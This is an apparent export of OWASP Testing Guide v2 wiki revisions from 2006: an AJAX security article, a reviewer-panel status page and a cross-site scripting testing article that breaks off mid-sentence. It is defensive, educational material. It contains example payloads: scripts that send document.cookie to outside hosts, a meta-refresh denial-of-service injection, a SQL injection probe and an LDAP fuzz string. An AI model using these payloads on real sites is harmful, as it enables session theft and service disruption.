[http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].<br /> &lt;br&gt;&lt;br&gt;<br /> '''Cross Site Scripting'''&lt;br&gt;Cross Site Scripting is a technique by which malicious content is injected in form of HTML links,Javascripts Alerts or in form of error messages. XSS exploits can be used for triggering various other attacks like cookie theft, account hijacking, and denial of service. &lt;br&gt;<br /> <br /> The Browser and Ajax Requests look identical, so the server is not able to classify them. Consequently it won't be able to discern who made the request in the background. A JavaScript program can request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information<br /> such as cookies to the request. JavaScript code can then access the response to this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site<br /> Scripting (XSS) attack.&lt;br&gt;<br /> <br /> Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.<br /> &lt;br&gt;&lt;br&gt;<br /> The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods<br /> to propagate itself invisibly to the user. &lt;br&gt;&lt;br&gt;<br /> <br /> *'''''Example''''' <br /> &lt;pre&gt;&lt;script&gt;alert(&quot;howdy&quot;)&lt;/script&gt;<br /> &lt;script&gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&lt;/script&gt;&lt;/pre&gt;&lt;br&gt;<br /> ''Usage:''<br /> &lt;pre&gt;http://example.com/login.php?variable=&quot;&gt;&lt;script&gt;document.location='http://www.irr.com/cont.php?'+document.cookie&lt;/script&gt;&lt;/pre&gt;<br /> This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.<br /> &lt;br&gt;&lt;br&gt;<br /> <br /> '''Client Side Injection Threats'''&lt;br&gt;<br /> * ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.<br /> &lt;br&gt;<br /> * ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)<br /> &lt;pre&gt;<br /> &lt;SCRIPT&gt;<br /> var pos=document.URL.indexOf(&quot;name=&quot;)+5;<br /> document.write(document.URL.substring(pos,document.URL.length));<br /> &lt;/SCRIPT&gt;&lt;/pre&gt;&lt;br&gt;<br /> * ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content.&lt;br&gt;&lt;br&gt;<br /> <br /> '''AJAX Bridging'''&lt;br&gt;<br /> For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&lt;br&gt;&lt;br&gt;<br /> <br /> '''Cross Site Request Forgery(XSRF)'''&lt;br&gt;<br /> CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet.&lt;br&gt;&lt;br&gt;<br /> <br /> '''Denial of Service'''&lt;br&gt;Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.&lt;pre&gt;&lt;IMG SRC=&quot;http://example.com/cgi-bin/ouch.cgi?a=b&quot;&gt;&lt;/pre&gt; <br /> &lt;br&gt;&lt;br&gt;<br /> '''Browser Based Attacks'''&lt;br&gt;The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks.&lt;br&gt;<br /> There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a &quot;ping&quot; using JavaScript &quot;image&quot; objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives.&lt;/p&gt;&lt;br&gt;&lt;p&gt;Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&lt;/p&gt;<br /> <br /> == Major Attacks ==<br /> <br /> <br /> '''MySpace Attack'''&lt;br&gt;The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed &lt;SCRIPT&gt; in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile&lt;br&gt;&lt;br&gt;<br /> <br /> '''Yahoo! Mail Attack'''&lt;br&gt;In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.<br /> <br /> == Testing == <br /> '''OWASP Testing Guide sections on AJAX Testing''' provides you a very good information on various aspects of AJAX Testing. &lt;br&gt;<br /> [[AJAX_Testing_AoC | 4.9 AJAX Testing ]]&lt;br&gt;<br /> [[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]]&lt;br&gt;<br /> <br /> == Testing Tools ==<br /> <br /> Here are some of the '''AJAX Testing Tools''' &lt;br&gt;&lt;br&gt;<br /> '''Venkman''' &lt;br&gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. &lt;br&gt;&lt;br&gt;<br /> ''' Ghost Train'''&lt;br&gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application.&lt;br&gt;&lt;br&gt;<br /> '''Squish/Web (froglogic)'''&lt;br&gt;<br /> [http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.&lt;br&gt;&lt;br&gt;<br /> '''JsUnit'''&lt;br&gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.<br /> <br /> == References == <br /> <br /> *[http://en.wikipedia.org/wiki/AJAX AJAX]&lt;br&gt;<br /> *[http://ajaxpatterns.org AJAX Patterns] <br /> <br /> ;'''Whitepapers'''&lt;br&gt;<br /> *[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, &quot;Ajax(in) Security&quot;,SPI Labs]&lt;br&gt;<br /> *[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, &quot;Analysis of Web Application Worms and Viruses&quot;,SPI Labs]&lt;br&gt;<br /> *[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, &quot;Ajax Security Dangers&quot;,SPI Labs]&lt;br&gt;<br /> <br /> ;'''Articles'''&lt;br&gt;<br /> *[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path]&lt;br&gt;<br /> *[http://www.webappsec.org/projects/articles/071105.html Amit Klein. &quot;DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS&quot;, Web Application Security Consortium]&lt;br&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&diff=13697 OWASP Testing Guide v2 Review Panel 2006-11-26T13:46:09Z <p>Wisec: Added comments on Fuzz and XSS</p> <hr /> <div>[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]<br /> <br /> <br /> Update: 24th November, 23.00 (GMT+1)&lt;br&gt;<br /> <br /> &lt;nowiki&gt;<br /> **********************<br /> &lt;/nowiki&gt;&lt;br&gt;Reviewing planning&lt;br&gt;<br /> &lt;nowiki&gt;<br /> **********************<br /> &lt;/nowiki&gt;&lt;br&gt;<br /> <br /> The reviewers are:<br /> Mark Roxberry,<br /> Alberto Revelli,<br /> Daniel Cuthbert,<br /> Antonio Parata,<br /> Matteo G.P. Flora,<br /> Matteo Meucci,<br /> Eoin Keary,<br /> Stefano Di Paola,<br /> James Kist,<br /> Vicente Aguilera,<br /> Mauro Bregolin,<br /> Syed Mohamed A,<br /> Paul Davies<br /> <br /> * II phase reviewing<br /> <br /> &lt;nowiki&gt;<br /> *********************************************************<br /> &lt;/nowiki&gt;&lt;br&gt;Here is the complete list of articles to be reviewed: &lt;br&gt;<br /> &lt;nowiki&gt;<br /> *********************************************************<br /> &lt;/nowiki&gt;<br /> <br /> <br /> ----<br /> * '''Introduction --&gt; reviewed by Eoin Keary'''<br /> '''[OK]'''<br /> <br /> <br /> ----<br /> * '''The OWASP Testing Framework --&gt;...'''<br /> 1 of 1 article to be reviewed (Daniel doing this)<br /> <br /> <br /> ----<br /> * '''4.1 Introduction and objectives --&gt;.EK'''<br /> '''[OK]'''<br /> <br /> ----<br /> * '''4.2 Information Gathering (Reviewed by EK) --&gt; Keary'''<br /> 9 of 10 articles reviewed -&gt; &lt;BR&gt; <br /> * '''Testing Web Application Fingerprint''' -added new article <br /> * '''Application Discovery''': <br /> ** Reviewed + updated(EK) (Maybe we should include HTTP methods for application descovery, such as HTTP HEAD command?)&lt;BR&gt;<br /> ** (Bregolin) If you are referring to things such as &quot;fingerprinting&quot;, it was hinted - and I personally agree on this - to create a new section on Web application fingerprinting. There's however a bit of overlap with Infrastructure configuration management testing<br /> * '''Analysis of error codes''': <br /> ** Reviewed + updated(EK) &lt;BR&gt;<br /> ** Besides the own error, it would be necessary to speak about the voluntary provocation of errors? (Vicente). Two examples: &lt;BR&gt;<br /> *** Example 1: Type error. (original): ?id=276 (test): ?id=X &lt;BR&gt;<br /> *** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &lt;BR&gt;<br /> ** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e. tester should verify if it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)<br /> * '''Infrastructure configuration management testing AoC''': <br /> ** Reviewed by EK. '''Not in typical guide structure -&gt; (MM: I've changed the structure)'''&lt;BR&gt;<br /> * '''SSL/TLS Testing AoC''': <br /> ** Reviewed + updated(EK). '''(Reviewed by MM: changed the structure)'''&lt;BR&gt;<br /> * '''DB Listener Testing''': <br /> ** '''Incomplete'''&lt;BR&gt;<br /> * '''Application configuration management testing''': <br /> ** Reviewed by EK. '''Not typical guide structure -&gt; (MM: I've changed the structure)'''<br /> ** This is generally a &quot;white box&quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, thats fine. '''- Need feedback on this one!!'''<br /> ** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??<br /> ** ''Logging'': Timestamp is also important<br /> * '''File extensions handling'''&lt;BR&gt;<br /> ** contains the text: &quot;''...To review and expand...''&quot; - '''Is this complete??'''<br /> ** '''Need a second opinion on this one...(MM yes it is complete)'''<br /> * '''Old file testing''': Reviewed by EK<br /> &lt;BR&gt;<br /> <br /> ----<br /> * '''4.3 Business logic testing --&gt; Meucci'''<br /> 1 of 1 article reviewed <br /> '''[OK]'''<br /> <br /> ----<br /> * '''4.4 Authentication Testing --&gt; Roxberry (articles have been edited)'''<br /> 0 of 7 articles to be reviewed <br /> '''[OK]'''<br /> ** 4.4 Authentication Testing (95%) : Reviewed by MR, Paul Davies to push to 100%<br /> ** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR <br /> ** 4.4.2 Brute Force (95%) : Reviewed by MR<br /> ** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR <br /> ** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR <br /> ** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR<br /> ** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR<br /> <br /> ----<br /> * '''4.5 Session Management Testing --&gt; Syed Mohamed A'''<br /> 5 of 6 articles to be reviewed <br /> ** 4.5 Session Management Testing (95%-&gt;100%) (daniel reviewing)<br /> ** 4.5.1 Analysis of the Session Management Schema (90%-&gt;100%) (daniel reviewing)<br /> ** 4.5.2 Cookie and Session token Manipulation (100%) (daniel reviewing)<br /> ** 4.5.3 Exposed session variables (90%-&gt;100%) (daniel reviewing)<br /> ** 4.5.4 Session Riding (XSRF) (80%-&gt;100%) (daniel reviewing)<br /> ** 4.5.5 HTTP Exploit (0%) (daniel reviewing)<br /> <br /> ----<br /> * '''4.6 Data Validation Testing --&gt; Meucci'''<br /> 18 articles reviewed (3 are at 0%)<br /> '''[OK]'''<br /> ** 4.6 Data Validation Testing : Reviewed by EK<br /> *** (Bregolin) begin<br /> *** [Note: Haven't committed the following since that would imply a substantial rewrite, let's see what others think]<br /> *** I think that this section should first categorize what constitutes input for a web application. (Which allows to identify what must be tested, and how). i.e., obviously input fields, hidden fields, HTTP headers (such as Referer, cookies), HTTP methods etc.<br /> *** There are other kinds of injection, such as CRLF injection.<br /> *** SQL Injection affects SQL statements, and not queries (though usually that's the case)<br /> *** It should be stressed that the main reason to perform data validation is to prevent application faults, i.e. unexpected behavior, that is violation of (security) requirements. Regardless of the categories of vulnerabilities listed, an application should (actually must!) verify all input against: type, length, range or domain validity. &quot;Bad&quot; input may not cause any of the listed vulnerabilities yet cause the application to misbehave, if it is not checked (possibly causing DoS or violating data integrity or confidentiality).<br /> *** (Bregolin) end<br /> ** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''<br /> *** Reviewed by SDP. Some thought about content structure: <br /> ***:As it is a testing guide, any other information about how to sanitize input should be referenced to Owasp Data Validation Project (no redundancy). Approach in testing section could be more schematic.<br /> ***:A kind of:<br /> **** Special characters entities etc.<br /> **** Context Dependent characters (an intro)<br /> **** How to search for Reflected, stored and DOM vulnerabilities.<br /> **** Non obvious injections (Administrative pages or non obvious pages) and second order injections (at least a small intro and/or a whitepaper/reference to incubated flaws).<br /> ** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.<br /> ** 4.6.2 SQL Injection (90%-&gt;100%) Reviewed by MM. Reviewed by EK.<br /> *** Not sure about &quot;inferential&quot; injection definition in &quot;Description of Issue&quot;<br /> *** Added some reference to Oracle. Corrected English.<br /> ** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough informations)'''<br /> **4.6.2.2 Oracle testing (0%) '''TD (not enough informations)'''<br /> ** 4.6.2.3 MySQL testing (100%) Reviewed by MM<br /> ** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. Reviewed by AR.<br /> ** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools<br /> ** 4.6.4 ORM Injection (100%) '''TD (not enough informations)'''<br /> ** 4.6.5 XML Injection (90%) Reviwed and updated by MM. '''WP and tools?'''<br /> ** 4.6.6 SSI Injection (95%-&gt;100%) Reviewed by MM <br /> ** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section is to complete?'''<br /> ** 4.6.8 IMAP/SMTP Injection (95%-&gt;100%)Reviewed by MM <br /> ** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''<br /> ** 4.6.10 OS Commanding (70%) Reviewed by MM + added an example. '''Not completed'''<br /> ** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''<br /> *** (Bregolin) The point is that these are not black box tests, so where they are now they are misplaced<br /> ** 4.6.11.1 Heap overflow (100%) Reviewed by MM<br /> ** 4.6.11.2 Stack overflow (100%)Reviewed by MM<br /> ** 4.6.11.3 Format string (100%)Reviewed by MM<br /> ** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?<br /> <br /> ----<br /> <br /> <br /> * '''4.7 Denial of Service Testing--&gt; Revelli'''<br /> 8 of 8 articles Reviewed<br /> '''[OK] - To do the References'''<br /> ** 4.7 Denial of Service Testing 100% Reviewed by Revelli<br /> ** 4.7.1 Locking Customer Accounts 100% Reviewd by Revelli<br /> ** 4.7.2 Buffer Overflows 100% Reviewd by Revelli<br /> ** 4.7.3 User Specified Object Allocation 100% Reviewd by Revelli<br /> ** 4.7.4 User Input as a Loop Counter 100% Reviewd by Revelli<br /> ** 4.7.5 Writing User Provided Data to Disk 100% Reviewd by Revelli<br /> ** 4.7.6 Failure to Release Resources 100% Reviewd by Revelli<br /> ** 4.7.7 Storing too Much Data in Session 100% Reviewd by Revelli<br /> <br /> ----<br /> * '''4.8 Web Services Testing --&gt; Matteo Meucci'''<br /> 6 of 6 articles reviewed<br /> '''[OK]'''<br /> ** 4.8 Web Services Testing (100%) Reviewed by Meucci<br /> ** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci<br /> ** 4.8.2 XML content-level Testing (90%-&gt;100%) Reviewed by Meucci<br /> ** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci<br /> ** 4.8.4 Naughty SOAP attachments (95%-&gt;100%) Reviewed by Meucci<br /> ** 4.8.5 Replay Testing (95%-&gt;100%) Reviewed by Meucci. <br /> <br /> ----<br /> * '''4.9 AJAX Testing --&gt; Roxberry'''<br /> 3 of 3 articles to be reviewed <br /> ** 4.9 AJAX Testing (70%)<br /> ** 4.9.1 Vulnerabilities (60%)<br /> ** 4.9.2 How to test (60%)<br /> <br /> ----<br /> * '''5. Writing Reports: value the real risk'''<br /> We have to write about it. I consider it not yet finished.<br /> O of 3 articles to be reviewed.<br /> <br /> ----<br /> * '''Appendix A: Testing Tools --&gt;Review and updated by Meucci'''<br /> 0 article of 1: need a paragraph to describe each OWASP tool<br /> <br /> ----<br /> * '''Appendix B: Suggested Reading --&gt;...'''<br /> 1 article of 1: need to update it <br /> <br /> ----<br /> * '''Appendix C: Fuzz Vectors --&gt; Stefano Di Paola, Subere '''<br /> ok. Some other fuzz vectors could be added. &lt;br&gt;<br /> How about every author to add his specific fuzz vector section?&lt;br&gt;<br /> Example: <br /> <br /> LDAP Injection: &lt;br&gt;<br /> <br /> &lt;nowiki&gt;*)(|%26&lt;br&gt;<br /> ... &lt;/nowiki&gt;<br /> <br /> <br /> ----<br /> <br /> &lt;nowiki&gt;<br /> *************************<br /> &lt;/nowiki&gt;&lt;br&gt;<br /> Reviewers Rules &lt;br&gt;<br /> &lt;nowiki&gt;<br /> *************************<br /> &lt;/nowiki&gt;<br /> <br /> 1) Check the english language&lt;br&gt;<br /> 2) Check the template: the articles on chapter 4 should have the following:&lt;br&gt;<br /> <br /> * Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)<br /> <br /> In some articles we don't need to talk about Gray Box Testing or other, so we can eliminate it.<br /> <br /> 3) Check the reference style. (I'd like to have all the referenced URLs visible because I have to produce also a pdf document of the Guide).<br /> I agree with Stefano, we have to use a reference like that:<br /> <br /> &lt;nowiki&gt;== References ==&lt;/nowiki&gt;<br /> <br /> &lt;nowiki&gt;'''Whitepapers'''&lt;br&gt;&lt;/nowiki&gt;<br /> <br /> &lt;nowiki&gt;* [1] Author1, Author2: &quot;Title&quot; - http://www.ietf.org/rfc/rfc2254.txt&lt;br&gt;&lt;/nowiki&gt;<br /> <br /> &lt;nowiki&gt;* [2]...&lt;br&gt;&lt;/nowiki&gt;<br /> <br /> &lt;nowiki&gt;'''Tools'''&lt;br&gt;&lt;/nowiki&gt;<br /> <br /> &lt;nowiki&gt;* Francois Larouche: &quot;Multiple DBMS Sql Injection tool&quot; - http://www.sqlpowerinjector.com/index.htm &lt;br&gt;&lt;/nowiki&gt;<br /> <br /> 4) Check the reference with the other articles of the guide or with the other OWASP Project.<br /> <br /> 5) Other?</div> Wisec https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13696 Testing for Cross site scripting 2006-11-26T12:57:29Z <p>Wisec: /* Description of the Issue */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> == Brief Summary ==<br /> Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br /> <br /> Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br /> <br /> Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br /> <br /> == Description of the Issue ==<br /> <br /> Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br /> <br /> Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the &lt;Script&gt; tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br /> Cross site scripting is used in many Phishing attacks.<br /> <br /> <br /> The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.<br /> Exploiting such a hole would be very similar to the exploit of Reflected XSS vulnerabilities , except in one very important situation. <br /> <br /> An example would be, if an attacker hosts a malicious website, which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.<br /> <br /> <br /> The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well know type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.<br /> <br /> At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.<br /> In some cases a denial of service attack can be performed on the server by doing the Following: <br /> article.php?title=&lt;meta%20http-equiv=&quot;refresh&quot;%20content=&quot;0;&quot;&gt;<br /> <br /> This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. <br /> <br /> The '''Stored Cross Site Scripting''' vulnerability, is the most powerful kinds of XSS attacks. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. A real life example of this would be SAMY, the XSS vulnerability found on MySpace in October of 2005.<br /> These vulnerabilities are more significant than other types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering or the web application could even be infected by a cross-site scripting virus.<br /> <br /> The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how if you posted a stored XSS script to a popular blog, newspaper or page comments section of a website, all the visitors of that page would have their internal networks scanned and logged for a particular type of vulnerability.<br /> <br /> ==Black Box testing and example==<br /> <br /> One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:&lt;BR&gt;<br /> <br /> '''/testcgi.exe?&lt;SCRIPT&gt;alert(“Cookie”+document.cookie)&lt;/SCRIPT&gt;'''<br /> <br /> The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br /> All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br /> <br /> The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br /> * Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br /> * Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br /> * Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “&lt;” to “&amp;lt;&gt;.<br /> * If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br /> * Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br /> * Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br /> The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br /> * Validate Input<br /> * Encode output<br /> Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br /> There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br /> The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.&lt;BR&gt;<br /> '''&gt; &lt; ( ) [ ] ' &quot; ; : / |'''<br /> <br /> &lt;b&gt;PHP&lt;/b&gt;<br /> The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br /> * '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br /> * '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br /> * '''Htmlspecialcharacters()''' turns characters such as '''&amp;,&gt;,&lt;,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br /> * '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.&lt;BR&gt;For example:<br /> '''&quot; style=&quot;background:url(JavaScript:alert(Malicious Content));'''<br /> <br /> &lt;b&gt;ASP.NET&lt;/b&gt;<br /> With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br /> * Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br /> * Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br /> * Use the '''HttpOnly cookie''' option for added protection.<br /> * As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br /> <br /> <br /> == Gray Box testing and example ==<br /> When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br /> <br /> ''Example 1:''<br /> <br /> Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case thinking render Cross 